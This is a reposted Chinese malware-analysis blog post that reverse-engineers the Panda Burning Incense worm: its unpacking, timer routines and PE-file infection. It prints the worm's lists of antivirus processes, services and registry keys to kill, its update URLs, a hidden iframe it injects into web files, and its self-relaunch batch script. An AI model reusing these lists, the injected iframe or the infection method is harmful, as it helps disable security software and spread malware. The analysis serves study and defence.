OD分析-熊猫烧香

转载自看雪论坛-暗夜之刃大神

https://bbs.pediy.com/thread-224773.htm

目录

0x01 分析注意事项-分析工具

0x02 病毒信息

0x03 病毒行为

0x04 脱壳

0x05 病毒初始化分析

0x06 Proc_时钟1 (时钟周期: 6000ms)

0x07 Proc_时钟2 (时钟周期: 1000ms)

0x08 Proc_时钟3 (时钟周期: 120000ms)

0x09 Proc_时钟4 (时钟周期: 10000ms)

0x10 Proc_时钟5 (时钟周期: 6000ms)

0x11 Proc_时钟6 (时钟周期: 10000ms)

0x12 Proc_时钟7 (时钟周期: 180000ms)

0x13 感染线程分析

0x14 具体感染流程分析

0x15 感染后程序的运行

0x01 分析注意事项-分析工具

(1) 这个病毒在xp系统分析比较好, Win7_64位下 “C:\WINDOWS\system32\drivers\” 目录不能运行程序.

<我在这里耽误了很长的时间, 病毒分析要尽量确定病毒运行的环境, 很多病毒是在特定的环境中运行>

(2) 两个很重要的API, 时钟回调 && 线程回调 都需要分析.

SetTimer: 病毒经常用时钟来定时结束指定进程.

CreateThread: 执行其他的代码分支, 感染PE文件的代码就是用线程执行的.

(3) IDA 的签名功能,能够识别很多的函数来进行辅助分析.

分析工具

火绒剑: 敏感行为检测很不错, OD动态调试时用来辅助分析函数功能很好用.

OD, IDA, 010Editor:

BCompare: 十六进制对比感染前与感染后的程序

PE类工具: 查壳 && 编程语言识别.

0x02 病毒信息

(1) 文件大小: 30,001字节

(2) MD5; 512301C535C88255C9A252FDF70B7A03

(3) 壳: FSG v2.0

(4) 编写语言: Delphi

0x03 病毒行为

(1) 写启动项

(2) 关闭服务

(3) 感染PE文件

(4) 访问指定网址, 判断是否需要更新

(5) 释放文件, 并设置文件属性为<隐藏|系统>

(6) 提升进程权限

(7) 遍历窗口名, 向指定窗口名发送QUIT消息, 并结束指定进程

0x04 脱壳

(1) 查壳

1565424979468

(1) 执行到OEP 处, 然后 dump文件.

559788_65TCQW4B4KC58F5.jpg

(2) 修复IAT 表的结尾, 然后在使用 ImpREC 工具修复输入表即可脱壳成功.

1565425003181

0x05 病毒初始化分析

(1) 判断字符串是否被修改

559788_DK8CZTE8RANKCP9.jpg

(2) 最重要的3个函数

1565425019778

(3) 判断Desktop_.ini 是否存在

559788_ZR3PFUTT3NPD4B2.jpg

(4) 将自身读入到内存中

559788_UY9ECEMBCNYKXY6.jpg

(5) 将 "C:\WINDOWS\system32\drivers\spo0lsv.exe" 转为大写后, 和自身路径对比

559788_WZSCH57YQP9C4UZ.jpg

(6) 如果不在 "C:\WINDOWS\system32\drivers\spo0lsv.exe" 处运行, 则将自身复制到 "C:\WINDOWS\system32\drivers\spo0lsv.exe"

559788_MNGUVBCB2KED343.jpg

运行 "C:\WINDOWS\system32\drivers\spo0lsv.exe", 并结束自身

559788_TDNBFB53RW6KMSG.jpg

0x06 Proc_时钟1 (时钟周期: 6000ms)

(1) 判断是否需要释放文件

559788_SZEW83WAFJK9JAD.jpg

(2) 遍历磁盘, 将自身复制到 盘符:\setup.exe

559788_SFT25C35FQ7XMFQ.jpg

(3) 遍历磁盘, 创建 盘符:\autorun.inf 文件

559788_7BAEHGCHK2Z9SS9.jpg

(4)设置setup.exe 文件属性为, <系统,隐藏>

559788_MSRY7SC4TK3QTSA.jpg

(5)设置autorun.inf 文件属性为, <系统,隐藏>

559788_NK7ZR4Z8UKT7RVN.jpg

559788_JCBE5SWT5U6GXY9.jpg

559788_9TAFXH9XKY4B8CT.jpg

(6) 写配置项

559788_J63NGK6AS8FJFU3.jpg

0x07 Proc_时钟2 (时钟周期: 1000ms)

(1) 提升进程权限

559788_9C75Z6ZREC6ANVM.jpg

(2) 遍历窗口名, 向指定窗口名发送QUIT消息, 并结束指定进程

559788_ZHMG3CX9AGAS4BX.jpg

1565425727596

559788_NTJ97F43CDSK7D8.jpg

查找的窗口列表:

防火墙,进程,VirusScan,NOD32,网镖,杀毒,毒霸,瑞星,江民,超级兔子,优化大师,木马清道夫,木馬清道夫,卡巴斯基反病毒

Symantec AntiVirus,Duba,esteem procs,绿鹰PC,密码防盗,噬菌体,木马辅助查找器,System Safety Monitor,Wrapped giftKiller

Winsock Expert,游戏木马检测大师,超级巡警,msctls_statusbar32,pjf(ustc),IceSword,

结束的进程列表:

Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.ex,TBMon.exe,scan32.exe,Ravmond.exe,CCenterexe,RavTask.exe,Rav.exe,

Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe,UIHost.exe,TrojDiekxp,

FrogAgent.exe,Logo1_.exe,Logo_1.exe,Rundl132.exe,regedit.exe,msconfig.exe,taskmgr.exe

(3) 写启动项

559788_SW2Z9775Y4VKWUU.jpg

(4) 设置隐藏的文件和文件夹,不可见

559788_K5Z8CZVYUXUJNPN.jpg

0x08 Proc_时钟3 (时钟周期: 120000ms)

(1) 通过 “http://www.ac86.cn/66/up.txt” 这个地址来更新, 网址已经失效了

1565425766677

0x09 Proc_时钟4 (时钟周期: 10000ms)

(1) 遍历磁盘, 关闭共享

559788_ZP4P8XTNCQMTMY3.jpg

(2) 关闭admin的共享

559788_9MZDPY9TGER43Q2.jpg

(3) 杀死当前时钟

559788_864AR5T54XM3C87.jpg

0x10 Proc_时钟5 (时钟周期: 6000ms)

(1) 将杀毒软件的注册表启动项设置为失效, 设置值为2, 被针对的杀毒软件注册表启动项列表如下:

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"

559788_DW742ZSHMXER56G.jpg

(2) 使用两种方式停止服务程序, 被停止的列表如下:

"sharedaccess","RsCCenter","RsRavMon","KVWSC" ,"KVSrvXP","kavsvc","AVP"

"McAfeeFramework","McShield","McTaskManager","navapsvc","wscsvc","KPfwSvc"

"KPfwSvc","ccProxy","ccProxy","ccProxy","SPBBCSvc","Symantec Core LC"

"NPFMntor","NPFMntor","FireSvc"

559788_SDW4JVNGCB4PYRF.jpg

0x11 Proc_时钟6 (时钟周期: 10000ms)

() 会获取这些网站的网页源码:

"http://www.tom.com"

"http://www.163.com"

"http://www.sohu.com"

"http://www.yahoo.com"

"http://www.google.com"

559788_CVSQQN6UPWN3DCW.jpg

0x12 Proc_时钟7 (时钟周期: 180000ms)

(1) 通过 “http://update.whboy.net/worm.txt” 这个地址来更新, 网址已经失效了

559788_8BFCAPHZMNANJ2J.jpg

0x13 感染线程分析

(1) 感染线程回调函数

559788_ZHF99UD98KT6EUU.jpg

(2) 获取所有磁盘名

559788_FHT945D3BQCYFGT.jpg

(3) 遍历磁盘_感染目标

559788_BQ2Q6TGECQ46GHV.jpg

(4) 感染的文件类型为: "EXE", "SRC", "PIF", "COM"

559788_RTSSWQMXFMBCK9R.jpg

559788_F9X7CEM5XCT7U3G.jpg

(5) 在网页文件 "html", "asp", "php", "jsp", "aspx" 的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.

559788_9UEVESB9DBDY7U5.jpg

559788_47GAPTG2XTW6WZR.jpg

0x14 具体感染流程分析

(1) 读入目标文件

559788_YNVU4HDMU8C57K5.jpg

(2) 从将要感染程序中查找 "WhBoy", 找到则说明已经被感染了

559788_MP57S9MGFXYXPVZ.jpg

(3) 设置目标文件属性为 “NORMAL”

559788_B4RCRYYPZ79DDKK.jpg

(4) 将自身复制为目标文件

559788_FR8AZA5YE43GC9S.jpg

(5) 将目标程序追加到病毒后面

559788_X7UCKPAPWRY5GNX.jpg

(6) 感染后的标志为 “WhBoy” + 被感染程序名 + “.exe”

559788_MWG6G4ATCT5SMX9.jpg

0x15 感染后程序的运行

(1) <感染后程序> 的结构,

559788_GGRGCQUUUU5QZNF.jpg

559788_4K2HYFNT2TVFMHH.jpg

(2) 判断是否被感染, 感染则跳转

559788_623BN3E5KC5KRXQ.jpg

(3) 创建 自身进程名 + “.exe”文件

559788_6ZJ3XGCTC8CY8V3.jpg

559788_WWFXFVVDNRBGM7E.jpg

(4) 从自身中提取 <源程序> 并写到 “BeInfected.exe.exe”

559788_28KRTKKGV5372GW.jpg

559788_BQ3DMWPJTVP8YP8.jpg

(5) 在 Temp目录 写批处理 并 运行批处理

559788_YC2KFRM649787AE.jpg

批处理内容:

//循环删除自身, 直至删除成功
:try1

del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"

if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1

//将 BeInfected.exe.exe 修改为 BeInfected.exe, 并运行 BeInfected.exe.

ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"

if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2

"C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"

:try2

del %0

执行生成的批处理

559788_D2ABGYXK49AF6XK.jpg

(6) <感染后程序> 就被还原成 <源程序> 了, 并运行 <源程序>.

559788_UXRM5T2BRA5F7E9.jpg

(1) 有什么错误请大神们指出.

(2) 并感谢15PB老师们的帮助和教导.

转载于:https://www.cnblogs.com/ltyandy/p/11332090.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值